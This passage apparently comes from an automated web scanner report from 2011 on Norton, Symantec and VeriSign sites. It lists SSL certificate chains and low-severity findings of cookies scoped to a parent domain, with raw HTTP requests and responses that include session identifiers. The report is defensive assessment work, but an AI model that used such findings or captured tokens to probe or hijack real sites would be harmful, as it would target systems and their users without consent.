Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.33. https://vipmobile.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vipmobile.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vipmobile.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Sun Dec 12 18:00:00 GMT-06:00 2010
Valid to:	Wed Dec 12 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.34. https://vs.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://vs.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	vs.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:	Thu Jun 27 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.35. https://www-secure.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www-secure.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www-secure.symantec.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Fri Oct 08 18:00:00 GMT-06:00 2010
Valid to:	Mon Oct 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.36. https://www.verisign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.verisign.com
Issued by:	VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:	Tue May 25 18:00:00 GMT-06:00 2010
Valid to:	Fri May 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

8.37. https://www4.symantec.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www4.symantec.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www4.symantec.com
Issued by:	VeriSign Class 3 International Server CA - G3
Valid from:	Thu Nov 18 18:00:00 GMT-06:00 2010
Valid to:	Sat Nov 19 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:	VeriSign Class 3 International Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:	Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:	Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:	Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain previous next
There are 82 instances of this issue:

http://buy.norton.com/
http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
http://buy.norton.com/estore/mf/landingProductFeatures
http://buy.norton.com/estore/mf/landingPromotion
http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
http://buy.norton.com/estore/mf/upgradeCenter
http://buy.norton.com/estore/mf/upgradeRenewal
http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://buy.norton.com/
http://buy.norton.com/ps
http://buy.norton.com/special-promotions
http://buy.norton.com/support
http://buy.norton.com/upgrades-renewals
http://buy.symanteccloud.com/freetrial
http://buy.symanteccloud.com/smbstore
http://free.pctools.com/res/js/utils.php
http://mbox3.offermatica.com/m2/verisign/mbox/standard
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/71097838/
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/favicon.ico
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/redirect
https://trust-center.verisign.com/process/retail/session_timeout
https://trust-center.verisign.com/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_product_selector
https://trust-center.verisign.com/process/retail/trust_product_selector.do
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
https://trust-center.verisign.com/rcm/verisign/images/divider.gif
https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
https://trust-center.verisign.com/rcm/verisign/images/logo.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
https://trust-center.verisign.com/rcm/verisign/images/truste.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
https://trust-center.verisign.com/rcm/verisign/scripts/default.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
http://www.verisign.co.uk/hp07/i/vlogo.gif
https://www.verisign.com/assets/visual-sciences/vip/zig.js

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

9.1. http://buy.norton.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:44 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=A14AC841-BBE7-6D86-6DD9-BA8D20C045DF; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:44 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 54738

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.3. http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:47 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:48 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 52186

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.4. http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:49 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=965C4203-1CEB-F7D8-7551-C453303B27DA; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:50 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 48409

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.5. http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0,must-revalidate, no-store
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:52 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=6BFEBE10-1BBE-1163-BE37-B80D146480F2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Set-Cookie: sessionExpiration=CH#de#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:52 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 63835

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.6. http://buy.norton.com/estore/mf/landingProductFeatures previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingProductFeatures

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=359A5BC1-187B-E37B-9025-A486DEF7EF50; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:31:18 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 HTTP/1.1
Host: buy.norton.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mbox=check#true#1315621948|session#1315621887128-280442#1315623748|PC#1315621887128-280442.19#1316831490; s_pers=%20s_nr%3D1315621900063-New%7C1336357900063%3B%20event69%3Devent69%7C1336357900064%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D760290967935%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621902268; JSESSIONID=LyytTqFG2snPQBSzMGKlyR2Ll6W2nTt9yvvmMtQHvQcdVXB18rCT!-50551110; COUNTRY=US; LANGUAGE=en; PROGRAMID_CREATED_DATE=09-09-2011; PROGRAMID=; PROGRAM_TYPE=UNKNOWN; FIRSTTIME_CV_DATE=Sep-09-2011 14:31:16; LASTTIME_CV_DATE=Sep-09-2011 14:31:16; TrafficSourceCookieName=trf_id:symcom; OriginalSubChannelCookieName=Online (1st); CurrentSubChannelCookieName=Online (1st); BIGipServerbuy1_prd_SSL=4046749583.16671.0000

Response

9.7. http://buy.norton.com/estore/mf/landingPromotion previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/landingPromotion

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/landingPromotion HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:32 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:32 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 50623

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.8. http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:58 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:58 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 68924

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.9. http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0, must-revalidate
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:38:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: symSessionGuid=1871EC55-36E3-C438-20E1-90A39091EBB2; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:38:02 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Length: 73974

<!DOCTYPE html>


<!--[if IE 8 ]> <html class="no-js ie8
...[SNIP]...

9.10. http://buy.norton.com/estore/mf/upgradeCenter previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://buy.norton.com
Path:	/estore/mf/upgradeCenter

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

symSessionGuid=67E30CDF-BDB1-483A-1966-A5EC32D19823; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/
sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:31 GMT; path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/upgradeCenter HTTP/1.1
